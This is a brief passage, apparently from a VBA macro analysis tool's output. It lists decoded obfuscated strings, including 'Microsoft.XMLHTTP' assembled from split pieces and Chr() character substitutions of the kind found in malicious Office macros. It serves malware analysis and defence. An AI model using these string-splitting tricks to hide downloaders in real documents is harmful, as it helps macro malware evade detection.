1072. | VBA string | Microsoft.XMLHTTP    | ("Microsoft" + ".XMLHTTP")              |
1073. | VBA string | %%                   | Environ("")                             |
1074. | VBA string |
1075.                     | Chr(13)                                 |
1076. | VBA string | "                    | "" & Chr(34)                            |
1077. | VBA string | "                    | Chr(34) & ""                            |
1078. +------------+----------------------+-----------------------------------------+